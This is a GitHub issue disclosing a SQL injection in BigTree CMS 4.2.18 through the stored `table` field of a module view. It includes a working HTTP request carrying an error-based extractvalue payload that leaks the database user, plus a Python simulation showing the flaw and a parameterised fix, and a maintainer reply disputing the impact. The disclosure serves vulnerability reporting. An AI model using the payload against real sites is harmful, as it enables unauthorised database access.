SQL injection in bigtreecms 4.2.18 #295

Closed
xfkxfk opened this issue Jun 6, 2017 · 1 comment

@xfkxfk

commented Jun 6, 2017

SQL injection in bigtreecms 4.2.18

FILE:
`\BigTree-CMS-4.2.18\core\admin\modules\developer\modules\views\create.php`

At first, create the view:

```php
$view_id = $admin->createModuleView($module,$title,$description,$table,$type,$options,$fields,$actions,$related_form,$preview_url);
```

The blemished parameter is `table`.

Then search the view:
`\BigTree-CMS-4.2.18\core\admin\ajax\auto-modules\views\searchable-page.php`

```php
// Grab View Data
if (isset($_GET["view"])) {
	$bigtree["view"] = BigTreeAutoModule::getView(sqlescape($_GET["view"]));
}
// ......
$data = BigTreeAutoModule::getSearchResults($bigtree["view"],$page,$search,$sort,false);
```

Continue in
`\BigTree-CMS-4.2.18\core\inc\bigtree\auto-modules.php`

```php
static function getView($id,$decode_ipl = true) {
	global $cms;

	if (is_array($id)) {
		$id = $id["id"];
	}

	// The id is escaped here, so this lookup itself is not the problem.
	$view = sqlfetch(sqlquery("SELECT * FROM bigtree_module_views WHERE id = '".sqlescape($id)."'"));
	// ......

static function getSearchResults($view,$page = 1,$query = "",$sort = "id DESC",$group = false) {
	// Check to see if we've cached this table before.
	self::cacheViewData($view);
	// ......

static function cacheViewData($view) {
	// $view["table"] is read back from the bigtree_module_views row and concatenated unescaped.
	$q = sqlquery("SELECT * FROM bigtree_pending_changes WHERE `table` = '".$view["table"]."' AND item_id IS NULL");
}
```

Here the variable `$view["table"]` has a SQLi vuln.

POC:
1. Add a module:
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/developer/modules/add/
2. Add a view for the module, setting `table` as `table=123_123%27 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#`:
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/developer/modules/views/add/?module=18

```http
POST /BigTree-CMS-4.2.18/site/index.php/admin/developer/modules/views/create/18/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 496
Referer: http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/developer/modules/views/edit/15/
Cookie:
Connection: close
Upgrade-Insecure-Requests: 1

csrf_token_5TK1XAX747RXJ9X7496WHQ3F46C8134H=EINM%2FLjgLccbJjtUPYyVswTRkk7nZa%2Bs6Xb%2BPTLi8Gs%3D&title=111111&preview_url&description=&table=123_123%27 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#&related_form=&type=searchable&options=%7B%22filter%22%3A%22%22%2C%22sort%22%3A%22%60asdf%60%60+ASC%22%2C%22per_page%22%3A%2215%22%7D&fields%5Basdf%60%5D%5Bwidth%5D=748&fields%5Basdf%60%5D%5Btitle%5D=Asdf%60&fields%5Basdf%60%5D%5Bparser%5D=&actions%5Bedit%5D=on&actions%5Bdelete%5D=on
```

3. Requesting this URL leads to SQLi:
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/ajax/auto-modules/views/searchable-page/?sort=&sort_direction=ASC&view=18&module=&search=&page=1

4. Requesting these URLs leads to SQLi too:
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/modules_name_at_one_step/
http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/developer/modules/views/style/module_id/

sqli
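As an added illustration (not part of this report or of BigTree's code), the following Python simulation models the flow the report describes with sqlite3: a `table` value is stored for a view, read back by a getView()-style lookup, and then concatenated into a cacheViewData()-style query; a parameterised version and an identifier check for the create step show the fix. The table layouts, rows and the quoted sample value are constructed.

```python
import re
import sqlite3

# Constructed sample rows (not from a real BigTree install). View 2 stores a
# `table` value containing a quote, as the developer "create view" form allows.
VIEWS = [(1, "articles"), (2, "x' OR 1=1 OR '")]
PENDING = [(1, "articles", None), (2, "pages", None), (3, "articles", 7)]

def setup_db():
    db = sqlite3.connect(":memory:")
    db.execute('CREATE TABLE bigtree_module_views (id INTEGER PRIMARY KEY, "table" TEXT)')
    db.execute('CREATE TABLE bigtree_pending_changes '
               '(id INTEGER PRIMARY KEY, "table" TEXT, item_id INTEGER)')
    db.executemany("INSERT INTO bigtree_module_views VALUES (?, ?)", VIEWS)
    db.executemany("INSERT INTO bigtree_pending_changes VALUES (?, ?, ?)", PENDING)
    return db

def get_view(db, view_id):
    # Mirrors getView(): the id is bound (the original runs it through sqlescape),
    # so this lookup is fine; the risk is in what comes back as view["table"].
    row = db.execute('SELECT id, "table" FROM bigtree_module_views WHERE id = ?',
                     (view_id,)).fetchone()
    return {"id": row[0], "table": row[1]} if row else None

def cache_view_data_vulnerable(db, view):
    # Mirrors the original cacheViewData(): the stored value is concatenated into
    # the statement, so a quote inside it rewrites the WHERE clause.
    sql = ('SELECT id FROM bigtree_pending_changes WHERE "table" = \''
           + view["table"] + "' AND item_id IS NULL ORDER BY id")
    return [r[0] for r in db.execute(sql)]

def cache_view_data_fixed(db, view):
    # Fix: bind the stored value as a parameter (or sqlescape() it, as getView
    # does) so it is compared as data whatever it contains.
    sql = 'SELECT id FROM bigtree_pending_changes WHERE "table" = ? AND item_id IS NULL ORDER BY id'
    return [r[0] for r in db.execute(sql, (view["table"],))]

TABLE_NAME_RE = re.compile(r"^[A-Za-z0-9_]+$")

def is_valid_table_name(name):
    # Defence in depth for create.php: a view's table is an identifier, so reject
    # anything that is not a plain identifier before it is ever stored.
    return bool(TABLE_NAME_RE.match(name))

if __name__ == "__main__":
    db = setup_db()
    hostile = get_view(db, 2)
    print("vulnerable:", cache_view_data_vulnerable(db, hostile))  # [1, 2, 3]
    print("fixed:     ", cache_view_data_fixed(db, hostile))       # []
    print("valid name:", is_valid_table_name(hostile["table"]))    # False
```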

@timbuckingham

Collaborator

commented Jun 10, 2017

As mentioned in the other SQL injection report, Developers already have access to direct PHP calls through column parsers in modules so this doesn't lead to an escalation of existing privileges or additional data leakage.
